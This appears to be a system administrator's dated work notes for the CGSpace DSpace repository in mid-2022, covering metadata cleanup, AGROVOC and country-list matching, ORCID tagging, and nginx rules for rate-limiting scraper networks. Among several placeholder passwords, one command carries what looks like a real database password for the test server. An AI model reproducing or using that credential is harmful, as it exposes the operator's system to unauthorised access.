- I merged the [Mirage 2 build fix](https://github.com/DSpace/DSpace/pull/8292) to `dspace-6_x` for DSpace 6.4
## 2022-06-07
- I tested Node.js 14 one more time with vanilla DSpace 6.4-SNAPSHOT and with the CGSpace source and it worked well
- I made [a pull request](https://github.com/DSpace/DSpace/pull/8331) to DSpace to use Node.js 14 for Mirage 2
- I even tested Node.js 16 and it works, but that is enough for now...
## 2022-06-08
- Work on AReS a bit since I wasn't able to harvest after doing the updates on the server and in the containers a few days ago
- I don't know what the problem was really, but on the server I had to enable IPv4 forwarding so the frontend container would build
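- For reference, enabling IPv4 forwarding is normally just a sysctl toggle (plus persisting it in /etc/sysctl.conf or a drop-in):
```console
# sysctl -w net.ipv4.ip_forward=1
```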
- Once I downed and upped AReS with docker-compose I was able to start a new harvest
- I also did some tests to enable ES2020 target in the backend because we're on Node.js 14 there now
## 2022-06-13
- Create a user for Mohammed Salem to test MEL submission on DSpace Test:
```console
$ dspace user -a -m mel-submit@cgiar.org -g MEL -s Submit -p 'owwwwwwww'
```
- According to my notes from [2020-10]({{< relref "2020-10.md" >}}) the account must be in the admin group in order to submit via the REST API
## 2022-06-14
- Start a harvest on AReS
## 2022-06-16
- Francesca asked us to add the CC-BY-3.0-IGO license to the submission form on CGSpace
- I remember I [had requested SPDX to add CC-BY-NC-ND-3.0-IGO](https://github.com/spdx/license-list-XML/issues/767) in 2019-02, and they finally [merged it](https://github.com/spdx/license-list-XML/pull/1068) in 2020-07, but I never added it to CGSpace
- I will add the full suite of CC 3.0 IGO licenses to CGSpace and then make a request to SPDX for the others:
- CC-BY-3.0-IGO
- CC-BY-SA-3.0-IGO
- CC-BY-ND-3.0-IGO
- CC-BY-NC-3.0-IGO
- CC-BY-NC-SA-3.0-IGO
- CC-BY-NC-ND-3.0-IGO
- I filed [an issue asking for SPDX to add CC-BY-3.0-IGO](https://github.com/spdx/license-list-XML/issues/1525)
- Meeting with Moayad from CodeObia to discuss OpenRXV
- He added the ability to use multiple indexes / dashboards, and to be able to embed them in iframes
- Add `cg.contributor.initiative` with a controlled vocabulary based on CLARISA's list to the CGSpace submission form
- Switch to the `linux-virtual-hwe-20.04` kernel on CGSpace (linode18), run all system updates, and reboot
## 2022-06-17
- I noticed a few ORCID identifiers missing for some scientists so I added them to the controlled vocabulary and then tagged them on CGSpace:
```console
$ cat 2022-06-17-add-orcids.csv
dc.contributor.author,cg.creator.identifier
"Tijjani, A.","Abdulfatai Tijjani: 0000-0002-0793-9059"
"Tijjani, Abdulfatai","Abdulfatai Tijjani: 0000-0002-0793-9059"
"Mrode, Raphael A.","Raphael Mrode: 0000-0003-1964-5653"
"Okeyo Mwai, Ally","Ally Okeyo Mwai: 0000-0003-2379-7801"
"Ojango, Julie M.K.","Ojango J.M.K.: 0000-0003-0224-5370"
"Prendergast, J.G.D.","James Prendergast: 0000-0001-8916-018X"
"Ekine-Dzivenu, Chinyere","Chinyere Ekine-Dzivenu: 0000-0002-8526-435X"
"Ekine, C.","Chinyere Ekine-Dzivenu: 0000-0002-8526-435X"
"Ekine-Dzivenu, C.C","Chinyere Ekine-Dzivenu: 0000-0002-8526-435X"
"Shilomboleni, Helena","Helena Shilomboleni: 0000-0002-9875-6484"
$ ./ilri/add-orcid-identifiers-csv.py -i /tmp/2022-06-17-add-orcids.csv -db dspace -u dspace -p 'fuuu' | tee /tmp/orcids.log
$ grep -c 'Adding ORCID' /tmp/orcids.log
304
```
- Also make some changes to the Discovery facets and item view
- I reduced the number of items to show for CRP facets from 20 to 5
- I added a facet for the Initiatives
- I re-organized a few parts of the item view to add Action Areas and the list of author affiliations
## 2022-06-18
- I deployed the changes on CGSpace and started a full Discovery index for the new Initiatives facet
- Run `dspace cleanup -v` on CGSpace
## 2022-06-20
- Add missing ORCID identifier for ILRI staff to CGSpace and tag their items
## 2022-06-21
- Work on OpenRXV backend dependencies
- Update Elasticsearch and TypeScript and eslint
- Sit in on webinar about contributing terms to AGROVOC
- I agreed that I would send Sara Jani from ICARDA a list of new terms we have that don't match AGROVOC by end of June
- I need to indicate which center is using them so we can have an appropriate expert review the terms
## 2022-06-22
- I re-deployed AReS with the latest OpenRXV changes then started a fresh harvest
- Meeting with Salem to discuss metadata between CGSpace and MEL
- We started working through his spreadsheet and then the Internet dropped
## 2022-06-23
- Start looking at country names between MEL, CGSpace, and standards like UN M.49 and GeoNames
- I used `xmllint` to extract the countries from CGSpace's input forms:
```console
$ xmllint --xpath '//value-pairs[@value-pairs-name="countrylist"]/pair/stored-value/node()' dspace/config/input-forms.xml > /tmp/cgspace-countries.txt
```
- Then I wrote a Python script (`countries-to-csv.py`) to read them and save their names alongside the ISO 3166-1 Alpha2 code
- Then I joined them with the other lists:
```console
$ csvjoin --outer -c alpha2 ~/Downloads/clarisa-countries.csv ~/Downloads/UNSD\ \ Methodology.csv ~/Downloads/geonames-countries.csv /tmp/cgspace-countries.csv /tmp/mel-countries.csv > /tmp/countries.csv
```
- This mostly worked fine, and is much easier than writing another Python script with Pandas...
## 2022-06-24
- Spent some more time working on my `countries-to-csv.py` script to fix some logic errors
- Then re-export the UN M.49 countries to a clean list because the one I did yesterday somehow has errors:
```console
$ csvcut -d ';' -c 'ISO-alpha2 Code,Country or Area' ~/Downloads/UNSD\ \ Methodology.csv | sed -e '1s/ISO-alpha2 Code/alpha2/' -e '1s/Country or Area/UN M.49 Name/' > ~/Downloads/un-countries.csv
```
- Check the number of lines in each file:
```
$ wc -l clarisa-countries.csv un-countries.csv cgspace-countries.csv mel-countries.csv
250 clarisa-countries.csv
250 un-countries.csv
198 cgspace-countries.csv
258 mel-countries.csv
```
- I am seeing strange results with csvjoin's `--outer` join when I need to keep unmatched terms from both the left and right files...
- Using `xsv join --full` is giving me better results:
```
$ xsv join --full alpha2 ~/Downloads/clarisa-countries.csv alpha2 ~/Downloads/un-countries.csv | xsv select '!alpha2[1]' > /tmp/clarisa-un-xsv-full.csv
```
- Then adding the CGSpace and MEL countries:
```console
$ xsv join --full alpha2 /tmp/clarisa-un-xsv-full.csv alpha2 /tmp/cgspace-countries.csv | xsv select '!alpha2[1]' > /tmp/clarisa-un-cgspace-xsv-full.csv
$ xsv join --full alpha2 /tmp/clarisa-un-cgspace-xsv-full.csv alpha2 /tmp/mel-countries.csv | xsv select '!alpha2[1]' > /tmp/clarisa-un-cgspace-mel-xsv-full.csv
```
## 2022-06-26
- Start a harvest on AReS
## 2022-06-28
- Start working on the CGSpace subject export for FAO / AGROVOC
- First I exported a list of all metadata in our `dcterms.subject` and other center-specific subject fields with their counts:
```console
localhost/dspacetest= ☘ \COPY (SELECT DISTINCT text_value AS "subject", count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (187, 120, 210, 122, 215, 127, 208, 124, 128, 123, 125, 135, 203, 236, 238, 119) GROUP BY "subject" ORDER BY count DESC) to /tmp/2022-06-28-cgspace-subjects.csv WITH CSV HEADER;
COPY 27010
```
- Then I extracted the subjects and looked them up against AGROVOC:
```console
$ csvcut -c subject /tmp/2022-06-28-cgspace-subjects.csv | sed '1d' > /tmp/2022-06-28-cgspace-subjects.txt
$ ./ilri/agrovoc-lookup.py -i /tmp/2022-06-28-cgspace-subjects.txt -o /tmp/2022-06-28-cgspace-subjects-results.csv
```
- I keep getting timeouts after every five or ten requests, so this will not be feasible for 27,000 subjects!
- I think I will have to write some custom script to use the AGROVOC RDF file
- Using rdflib to open the 1.2GB `agrovoc_lod.rdf` file takes several minutes and doesn't seem very efficient
- I tried using [lightrdf](https://github.com/ozekik/lightrdf) and it's much quicker, but the documentation is limited and I'm not sure how to search yet
- I had to try in different Python versions because 3.10.x is apparently too new
- For future reference I was able to search with lightrdf:
```python
import lightrdf
parser = lightrdf.Parser()
# prints millions of lines
for triple in parser.parse("./agrovoc_lod.rdf", base_iri=None):
    print(triple)
agrovoc = lightrdf.RDFDocument('agrovoc_lod.rdf');
# all results for prefix http://aims.fao.org/aos/agrovoc/c_5
for triple in agrovoc.search_triples('http://aims.fao.org/aos/agrovoc/c_5', None, None):
    print(triple)
('http://aims.fao.org/aos/agrovoc/c_5', 'http://www.w3.org/2004/02/skos/core#altLabel', '"Abalone"@de')
('http://aims.fao.org/aos/agrovoc/c_5', 'http://www.w3.org/2004/02/skos/core#prefLabel', '"abalones"@en')
# all stuff for abalones in English
for triple in agrovoc.search_triples(None, None, '"abalones"@en'):
    print(triple)
```
- I ran the `agrovoc-lookup.py` from a Linode server and it completed without issues... hmmm
## 2022-06-29
- Continue working on the list of non-AGROVOC subject to report to FAO
- I got a one liner to get the list of non-AGROVOC subjects and join them with their counts (updated to use regex in csvgrep):
```console
$ csvgrep -c 'number of matches' -r '^0$' /tmp/2022-06-28-cgspace-subjects-results.csv \
| csvcut -c subject \
| csvjoin -c subject /tmp/2022-06-28-cgspace-subjects.csv - \
> /tmp/2022-06-28-cgspace-non-agrovoc.csv
```
## 2022-06-30
- Check some AfricaRice records for potential duplicates on CGSpace for Abenet:
```console
$ csvcut -l -c dc.title,dcterms.issued,dcterms.type ~/Downloads/Africarice_2ndBatch_ay.csv | sed '1s/line_number/id/' > /tmp/africarice.csv
$ csv-metadata-quality -i /tmp/africarice.csv -o /tmp/africarice-cleaned.csv -u
$ ./ilri/check-duplicates.py -i /tmp/africarice-cleaned.csv -u dspacetest -db dspacetest -p 'dom@in34sniper' -o /tmp/africarice-duplicates.csv
```
- Looking at the non-AGROVOC subjects again, I see some in our list that are duplicated in uppercase and lowercase, so I will run it again with all lowercase:
```console
localhost/dspacetest= ☘ \COPY (SELECT DISTINCT(lower(text_value)) AS "subject", count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (187, 120, 210, 122, 215, 127, 208, 124, 128, 123, 125, 135, 203, 236, 238, 119) GROUP BY "subject" ORDER BY count DESC) to /tmp/2022-06-30-cgspace-subjects.csv WITH CSV HEADER;
```
- Also, I see there might be something wrong with my csvjoin because nigeria shows up in the final list as having not matched...
- Ah, I was using `csvgrep -m 0` to find rows that didn't match, but that also matched items that had 10, 100, 50, etc...
- We need to use a regex:
```console
$ csvgrep -c 'number of matches' -r '^0$' /tmp/2022-06-30-cgspace-subjects-results.csv \
| csvcut -c subject \
| csvjoin -c subject /tmp/2022-06-30-cgspace-subjects.csv - \
> /tmp/2022-06-30-cgspace-non-agrovoc.csv
```
- Then I took all the terms with fifty or more occurrences and put them on a Google Sheet
- There I started removing any term that was a variation of an existing AGROVOC term (like cowpea/cowpeas, policy/policies) or a compound concept
- pnbecker on DSpace Slack mentioned that they made a JSPUI deduplication step that is open source: https://github.com/the-library-code/deduplication
- It uses Levenshtein distance via PostgreSQL's fuzzystrmatch extension
<!-- vim: set sw=2 ts=2: -->

content/posts/2022-07.md
---
title: "July, 2022"
date: 2022-07-02T14:07:36+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2022-07-02
- I learned how to use the Levenshtein functions in PostgreSQL
- The thing is that there is a limit of 255 characters for these functions in PostgreSQL so you need to truncate the strings before comparing
- Also, the trgm functions I've used before are case insensitive, but Levenshtein is not, so you need to make sure to lower case both strings first
<!--more-->
- A working query checking for duplicates in the recent AfricaRice items is:
```console
localhost/dspace= ☘ SELECT text_value FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND levenshtein_less_equal(LOWER('International Trade and Exotic Pests: The Risks for Biodiversity and African Economies'), LEFT(LOWER(text_value), 255), 3) <= 3;
text_value
────────────────────────────────────────────────────────────────────────────────────────
International trade and exotic pests: the risks for biodiversity and African economies
(1 row)
Time: 399.751 ms
```
- There is a great [blog post discussing Soundex with Levenshtein](https://www.crunchydata.com/blog/fuzzy-name-matching-in-postgresql) and creating indexes to make them faster
- I want to do some proper checks of accuracy and speed against my trigram method
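- For reference, the Levenshtein and Soundex functions come from PostgreSQL's fuzzystrmatch extension, which can be enabled per database if it isn't already:
```console
localhost/dspace= ☘ CREATE EXTENSION IF NOT EXISTS fuzzystrmatch;
```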
## 2022-07-03
- Start a harvest on AReS
## 2022-07-04
- Linode told me that CGSpace had high load yesterday
- I also got some up and down notices from UptimeRobot
- Looking now, I see there was a very high CPU and database pool load, but a mostly normal DSpace session count
![CPU load day](/cgspace-notes/2022/07/cpu-day.png)
![JDBC pool day](/cgspace-notes/2022/07/jmx_tomcat_dbpools-day.png)
- Seems we have some old database transactions since 2022-06-27:
![PostgreSQL locks week](/cgspace-notes/2022/07/postgres_locks_ALL-week.png)
![PostgreSQL query length week](/cgspace-notes/2022/07/postgres_querylength_ALL-week.png)
- Looking at the top connections to nginx yesterday:
```console
# awk '{print $1}' /var/log/nginx/{access,library-access,oai,rest}.log.1 | sort | uniq -c | sort -h | tail
1132 64.124.8.34
1146 2a01:4f8:1c17:5550::1
1380 137.184.159.211
1533 64.124.8.59
4013 80.248.237.167
4776 54.195.118.125
10482 45.5.186.2
11177 172.104.229.92
15855 2a01:7e00::f03c:91ff:fe9a:3a37
22179 64.39.98.251
```
- And the total number of unique IPs:
```console
# awk '{print $1}' /var/log/nginx/{access,library-access,oai,rest}.log.1 | sort -u | wc -l
6952
```
- This seems low, so it must have been from the request patterns by certain visitors
- 64.39.98.251 is Qualys, and I'm debating blocking [all their IPs](https://pci.qualys.com/static/help/merchant/getting_started/check_scanner_ip_addresses.htm) using a geo block in nginx (need to test)
- The top few are known ILRI and other CGIAR scrapers, but 80.248.237.167 is on InternetVikings in Sweden, using a normal user agent and scraping Discover
- 64.124.8.59 is making requests with a normal user agent and belongs to Castle Global or Zayo
- I ran all system updates and rebooted the server (could have just restarted PostgreSQL but I thought I might as well do everything)
- I implemented a geo mapping for both the user agent mapping AND the nginx `limit_req_zone`, by extracting the networks into an external file and including it in two different geo mapping blocks
- This is clever and relies on the fact that we can use defaults in both cases
- First, we map the user agent of requests from these networks to "bot" so that Tomcat and Solr handle them accordingly
- Second, we use this as a key in a `limit_req_zone`, which relies on a default mapping of '' (and nginx doesn't evaluate empty cache keys)
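- The gist of it looks roughly like this (a simplified sketch using one geo block plus a map, with illustrative paths, networks, and zone names rather than the exact configuration in the playbooks):
```console
# cat /etc/nginx/bot-networks.conf
192.0.2.0/24    bot;
# cat /etc/nginx/conf.d/bot-mapping.conf
geo $bot_network {
    default     '';
    include     /etc/nginx/bot-networks.conf;
}
map $bot_network $ua {
    default     $http_user_agent;
    bot         bot;
}
limit_req_zone $bot_network zone=bot_networks:16m rate=1r/s;
```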
- I noticed that CIP uploaded a number of Georgian presentations with `dcterms.language` set to English and Other so I changed them to "ka"
- Perhaps we need to update our list of languages to include all instead of the most common ones
- I wrote a script `ilri/iso-639-value-pairs.py` to extract the names and Alpha 2 codes for all ISO 639-1 languages from pycountry and added them to `input-forms.xml`
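- Not the actual script, but the gist of pulling the codes and names out of pycountry is something like:
```console
$ python3 -c "import pycountry; [print(l.alpha_2 + ',' + l.name) for l in pycountry.languages if hasattr(l, 'alpha_2')]"
```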
## 2022-07-06
- CGSpace went down and up a few times due to high load
- I found one host in Romania making very high speed requests with a normal user agent (`Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0E; .NET4.0C`):
```console
# awk '{print $1}' /var/log/nginx/{access,library-access,oai,rest}.log | sort | uniq -c | sort -h | tail -n 10
516 142.132.248.90
525 157.55.39.234
587 66.249.66.21
593 95.108.213.59
1372 137.184.159.211
4776 54.195.118.125
5441 205.186.128.185
6267 45.5.186.2
15839 2a01:7e00::f03c:91ff:fe9a:3a37
36114 146.19.75.141
```
- I added 146.19.75.141 to the list of bot networks in nginx
- While looking at the logs I started thinking about Bing again
- They apparently [publish a list of all their networks](https://www.bing.com/toolbox/bingbot.json)
- I wrote a script to use `prips` to [print the IPs for each network](https://stackoverflow.com/a/52501093/1996540)
- The script is `bing-networks-to-ips.sh`
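- The gist of it is something like this (a rough sketch, not the exact script; it assumes the JSON lists networks under `prefixes[].ipv4Prefix` like Google's equivalent file does):

```console
# extract the IPv4 networks from Bing's published list (JSON structure assumed)
$ curl -s https://www.bing.com/toolbox/bingbot.json | jq -r '.prefixes[].ipv4Prefix' > /tmp/bing-networks.txt
# enumerate each network's hosts, dropping the network and broadcast addresses
$ while read -r network; do prips "$network" | sed -e '1d; $d'; done < /tmp/bing-networks.txt > /tmp/bing-ips.txt
```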
- From Bing's IPs alone I purged 145,403 hits... sheesh
- Delete two items on CGSpace for Margarita because she was getting the "Authorization denied for action OBSOLETE (DELETE) on BITSTREAM:0b26875a-..." error
- This is the same DSpace 6 bug I noticed in 2021-03, 2021-04, and 2021-05
- Update some `cg.audience` metadata to use "Academics" instead of "Academicians":
```console
dspace=# UPDATE metadatavalue SET text_value='Academics' WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value='Academicians';
UPDATE 104
```
- I will also have to remove "Academicians" from input-forms.xml
## 2022-07-07
- Finalize lists of non-AGROVOC subjects in CGSpace that I started last week
- I used the [SQL helper functions](https://wiki.lyrasis.org/display/DSPACE/Helper+SQL+functions+for+DSpace+6) to find the collections where each term was used:
```console
localhost/dspace= ☘ SELECT DISTINCT(ds6_item2collectionhandle(dspace_object_id)) AS collection, COUNT(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND LOWER(text_value) = 'water demand' GROUP BY collection ORDER BY count DESC LIMIT 5;
collection │ count
─────────────┼───────
10568/36178 │ 56
10568/36185 │ 46
10568/36181 │ 35
10568/36188 │ 28
10568/36179 │ 21
(5 rows)
```
- For now I only did terms from my list that had 100 or more occurrences in CGSpace
- This leaves us with thirty-six terms that I will send to Sara Jani and Elizabeth Arnaud for evaluating possible inclusion to AGROVOC
- Write to some submitters from CIAT, Bioversity, and CCAFS to ask if they are still uploading new items with their legacy subject fields on CGSpace
- We want to remove them from the submission form to create space for new fields
- Update one term I noticed people using that was close to AGROVOC:
```console
dspace=# UPDATE metadatavalue SET text_value='development policies' WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=187 AND text_value='development policy';
UPDATE 108
```
- After contacting some editors I removed some old metadata fields from the submission form and browse indexes:
- Bioversity subject (`cg.subject.bioversity`)
- CCAFS phase 1 project tag (`cg.identifier.ccafsproject`)
- CIAT project tag (`cg.identifier.ciatproject`)
- CIAT subject (`cg.subject.ciat`)
- Work on cleaning and proofing forty-six AfricaRice items for CGSpace
- Last week we identified some duplicates so I removed those
- The data is of mediocre quality
- I've been fixing citations (nitpick), adding licenses, adding volume/issue/extent, fixing DOIs, and adding some AGROVOC subjects
- I even found titles that have typos, looking something like OCR errors...
## 2022-07-08
- Finalize the cleaning and proofing of AfricaRice records
- I found two suspicious items that claim to have been published but I can't find in the respective journals, so I removed those
- I uploaded the forty-four items to [DSpace Test](https://dspacetest.cgiar.org/handle/10568/119135)
- Margarita from CCAFS said they are no longer using the CCAFS subject or CCAFS phase 2 project tag
- I removed these from the input-form.xml and Discovery facets:
- cg.identifier.ccafsprojectpii
- cg.subject.cifor
- For now we will keep them in the search filters
- I modified my `check-duplicates.py` script a bit to fix a logic error for deleted items and add similarity scores from spacy (see: https://stackoverflow.com/questions/8897593/how-to-compute-the-similarity-between-two-text-documents)
- I want to use this with the MARLO innovation reports, to find related publications and working papers on CGSpace
- I am curious to see how the similarity scores compare to those from trgm... perhaps we don't need them actually
- Deploy latest changes to submission form, Discovery, and browse on CGSpace
- Also run all system updates and reboot the host
- Fix 152 `dcterms.relation` that are using "cgspace.cgiar.org" links instead of handles:
```console
UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, '.*cgspace\.cgiar\.org/handle/(\d+/\d+)$', 'https://hdl.handle.net/\1') WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=180 AND text_value ~ 'cgspace\.cgiar\.org/handle/\d+/\d+$';
```
## 2022-07-10
- UptimeRobot says that CGSpace is down
- I see high load around 22, high CPU around 800%
- Doesn't seem to be a lot of unique IPs:
```console
# awk '{print $1}' /var/log/nginx/{access,library-access,oai,rest}.log | sort -u | wc -l
2243
```
- Looking at the top twenty I see some of the usual IPs, but also some new ones on Hetzner that are using many DSpace sessions:
```console
$ grep 65.109.2.97 dspace.log.2022-07-10 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
1613
$ grep 95.216.174.97 dspace.log.2022-07-10 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
1696
$ grep 65.109.15.213 dspace.log.2022-07-10 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
1708
$ grep 65.108.80.78 dspace.log.2022-07-10 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
1830
$ grep 65.108.95.23 dspace.log.2022-07-10 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
1811
```
![DSpace sessions week](/cgspace-notes/2022/07/jmx_dspace_sessions-week.png)
- These IPs are using normal-looking user agents:
- `Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.9) Gecko/20100101 Goanna/4.1 Firefox/52.9 PaleMoon/28.0.0.1`
- `Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/45.0"`
- `Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:56.0) Gecko/20100101 Firefox/56.0.1 Waterfox/56.0.1`
- `Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.85 Safari/537.36`
- I will add networks I'm seeing now to nginx's bot-networks.conf for now (not all of Hetzner) and purge the hits later:
- 65.108.0.0/16
- 65.21.0.0/16
- 95.216.0.0/16
- 135.181.0.0/16
- 138.201.0.0/16
- I think I'm going to get to a point where I categorize all commercial subnets as bots by default and then whitelist those we need
- Sheesh, there are a bunch more IPv6 addresses also on Hetzner:
```console
# awk '{print $1}' /var/log/nginx/{access,library-access}.log | sort | grep 2a01:4f9 | uniq -c | sort -h
1 2a01:4f9:6a:1c2b::2
2 2a01:4f9:2b:5a8::2
2 2a01:4f9:4b:4495::2
96 2a01:4f9:c010:518c::1
137 2a01:4f9:c010:a9bc::1
142 2a01:4f9:c010:58c9::1
142 2a01:4f9:c010:58ea::1
144 2a01:4f9:c010:58eb::1
145 2a01:4f9:c010:6ff8::1
148 2a01:4f9:c010:5190::1
149 2a01:4f9:c010:7d6d::1
153 2a01:4f9:c010:5226::1
156 2a01:4f9:c010:7f74::1
160 2a01:4f9:c010:5188::1
161 2a01:4f9:c010:58e5::1
168 2a01:4f9:c010:58ed::1
170 2a01:4f9:c010:548e::1
170 2a01:4f9:c010:8c97::1
175 2a01:4f9:c010:58c8::1
175 2a01:4f9:c010:aada::1
182 2a01:4f9:c010:58ec::1
182 2a01:4f9:c010:ae8c::1
502 2a01:4f9:c010:ee57::1
530 2a01:4f9:c011:567a::1
535 2a01:4f9:c010:d04e::1
539 2a01:4f9:c010:3d9a::1
586 2a01:4f9:c010:93db::1
593 2a01:4f9:c010:a04a::1
601 2a01:4f9:c011:4166::1
607 2a01:4f9:c010:9881::1
640 2a01:4f9:c010:87fb::1
648 2a01:4f9:c010:e680::1
1141 2a01:4f9:3a:2696::2
1146 2a01:4f9:3a:2555::2
3207 2a01:4f9:3a:2c19::2
```
- Maybe it's time I ban all of Hetzner... sheesh.
- I left for a few hours and the server was going up and down the whole time, still very high CPU and database when I got back
![CPU day](/cgspace-notes/2022/07/cpu-day.png)
- I am not sure what's going on
- I extracted all the IPs and used `resolve-addresses-geoip2.py` to analyze them and extract all the Hetzner networks and block them
- It's 181 IPs on Hetzner...
- I rebooted the server to see if it was just some stuck locks in PostgreSQL...
- The load is still higher than I would expect, and after a few more hours I see more Hetzner IPs coming through, so there are two more subnets to block
- Start a harvest on AReS
## 2022-07-12
- Update an incorrect ORCID identifier for Alliance
- Adjust collection permissions on CIFOR publications collection so Vika can submit without approval
## 2022-07-14
- Someone on the DSpace Slack mentioned having issues with the database configuration in DSpace 7.3
- The reason is apparently that the default `db.dialect` changed from "org.dspace.storage.rdbms.hibernate.postgres.DSpacePostgreSQL82Dialect" to "org.hibernate.dialect.PostgreSQL94Dialect" as a result of a Hibernate update
- Then I was getting more errors starting the backend server in Tomcat, but the issue was that the backend server needs Solr to be up first!
## 2022-07-17
- Start a harvest on AReS around 3:30PM
- Later in the evening I see CGSpace was going down and up (not as bad as last Sunday) with around 18.0 load...
- I see very high CPU usage:
![CPU day](/cgspace-notes/2022/07/cpu-day2.png)
- But DSpace sessions are normal (not like last weekend):
![DSpace sessions week](/cgspace-notes/2022/07/jmx_dspace_sessions-week2.png)
- I see some Hetzner IPs in the top users today, but most of the requests are getting HTTP 503 because of the changes I made last week
- I see 137.184.159.211, which is on Digital Ocean, and the DNS is apparently iitawpsite.iita.org
- I've seen their user agent before, but I don't think I knew it was IITA: "GuzzleHttp/6.3.3 curl/7.84.0 PHP/7.4.30"
- I already have something in nginx to mark Guzzle as a bot, but interestingly it shows up in Solr as `$http_user_agent` so there is a logic error in my nginx config
- Ouch, the logic error seems to be this:
```console
geo $ua {
default $http_user_agent;
include /etc/nginx/bot-networks.conf;
}
```
- After some testing on DSpace Test I see that this is actually setting the default user agent to a literal `$http_user_agent`
- The [nginx map docs](http://nginx.org/en/docs/http/ngx_http_map_module.html) say:
> The resulting value can contain text, variable (0.9.0), and their combination (1.11.0).
- But I can't get it to work, neither for the default value nor for matching my IP...
- I will have to ask on the nginx mailing list
- The total number of requests and unique hosts was not even very high (checked below around midnight, so this covers almost the whole day):
```console
# awk '{print $1}' /var/log/nginx/{access,library-access,oai,rest}.log | sort -u | wc -l
2776
# awk '{print $1}' /var/log/nginx/{access,library-access,oai,rest}.log | wc -l
40325
```
## 2022-07-18
- Reading more about nginx's geo/map and doing some tests on DSpace Test, it appears that the [geo module cannot do dynamic values](https://stackoverflow.com/questions/47011497/nginx-geo-module-wont-use-variables)
- So this issue with the literal `$http_user_agent` is due to the geo block I put in place earlier this month
- I reworked the logic so that the geo block sets "bot" or an empty string depending on whether a network matches, and then re-used that value in a mapping that passes through the client's real user agent when geo has set it to an empty string
- This allows me to accomplish the original goal while still only using one bot-networks.conf file for the `limit_req_zone` and the user agent mapping that we pass to Tomcat
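- Roughly, the reworked configuration looks like this (a minimal sketch; the `$bot_network` variable, zone name, and rate are illustrative, not the exact values we deploy):

```console
geo $bot_network {
    default '';
    include /etc/nginx/bot-networks.conf;   # entries map each network to the value 'bot'
}

map $bot_network $ua {
    default $http_user_agent;   # not a bot network: pass the client's real user agent through
    'bot'   'bot';              # bot network: override so Tomcat and Solr classify it as a bot
}

# requests with an empty key are not accounted, so only the bot networks get rate limited
limit_req_zone $bot_network zone=bot_networks:10m rate=1r/s;
```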
- Unfortunately this means I will have hundreds of thousands of requests in Solr with a literal `$http_user_agent`
- I might try to purge some by enumerating all the networks in my block file and running them through `check-spider-ip-hits.sh`
- I extracted all the IPs/subnets from `bot-networks.conf` and prepared them so I could enumerate their IPs
- I had to add `/32` to all single IPs, which I did with this crazy vim invocation:
```console
:g!/\/\d\+$/s/^\(\d\+\.\d\+\.\d\+\.\d\+\)$/\1\/32/
```
- Explanation:
- `g!`: global, lines *not* matching (the opposite of `g`)
- `/\/\d\+$/`, pattern matching `/` with one or more digits at the end of the line
- `s/^\(\d\+\.\d\+\.\d\+\.\d\+\)$/\1\/32/`, for lines not matching above, capture the IPv4 address and add `/32` at the end
- Then I ran the list through prips to enumerate the IPs:
```console
$ while read -r line; do prips "$line" | sed -e '1d; $d'; done < /tmp/bot-networks.conf > /tmp/bot-ips.txt
$ wc -l /tmp/bot-ips.txt
1946968 /tmp/bot-ips.txt
```
- I started running `check-spider-ip-hits.sh` with the 1946968 IPs and left it running in dry run mode
## 2022-07-19
- Patrizio and Fabio emailed me to ask if their IP was banned from CGSpace
- It's one of the Hetzner ones so I said yes definitely, and asked more about how they are using the API
- Add ORCID identifiers for Ram Dhulipala, Lilian Wambua, and Dan Masiga to CGSpace and tag them and some other existing items:
```console
dc.contributor.author,cg.creator.identifier
"Dhulipala, Ram K","Ram Dhulipala: 0000-0002-9720-3247"
"Dhulipala, Ram","Ram Dhulipala: 0000-0002-9720-3247"
"Dhulipala, R.","Ram Dhulipala: 0000-0002-9720-3247"
"Wambua, Lillian","Lillian Wambua: 0000-0003-3632-7411"
"Wambua, Lilian","Lillian Wambua: 0000-0003-3632-7411"
"Masiga, D.K.","Daniel Masiga: 0000-0001-7513-0887"
"Masiga, Daniel K.","Daniel Masiga: 0000-0001-7513-0887"
"Jores, Joerg","Joerg Jores: 0000-0003-3790-5746"
"Schieck, Elise","Elise Schieck: 0000-0003-1756-6337"
"Schieck, Elise G.","Elise Schieck: 0000-0003-1756-6337"
$ ./ilri/add-orcid-identifiers-csv.py -i /tmp/2022-07-19-add-orcids.csv -db dspace -u dspace -p 'fuuu'
```
- Review the AfricaRice records from earlier this month again
- I found one more duplicate and one more suspicious item, so the total after removing those is now forty-two
- I took all the ~560 IPs that had hits so far in `check-spider-ip-hits.sh` above (about 270,000 into the list of 1946968 above) and ran them directly on CGSpace
- This purged 199,032 hits from Solr, very many of which were from Qualys, but also that Chinese bot on 124.17.34.0/24 that was grabbing PDFs a few years ago which I blocked in nginx, but never purged the hits from
- Then I deleted all IPs up to the last one where I found hits in the large file of 1946968 IPs and re-started the script
## 2022-07-20
- Did a few more minor edits to the forty-two AfricaRice records (including generating thumbnails for the handful that are Creative Commons licensed) then did a test import on my local instance
- Once it worked well I did an import to CGSpace:
```console
$ dspace import -a -e fuuu@example.com -m 2022-07-20-africarice.map -s /tmp/SimpleArchiveFormat
```
